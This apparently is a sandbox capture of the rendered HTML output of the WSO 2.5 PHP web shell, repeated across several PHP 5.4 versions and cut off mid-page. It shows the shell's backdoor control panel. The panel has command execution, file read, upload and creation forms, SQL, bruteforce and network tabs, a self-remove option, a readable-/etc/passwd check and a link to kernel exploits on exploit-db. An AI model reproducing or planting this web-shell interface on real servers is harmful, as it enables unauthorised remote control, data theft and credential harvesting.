width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.11
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.11 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.10
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.10 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.9
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.9 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.8
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.8 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> 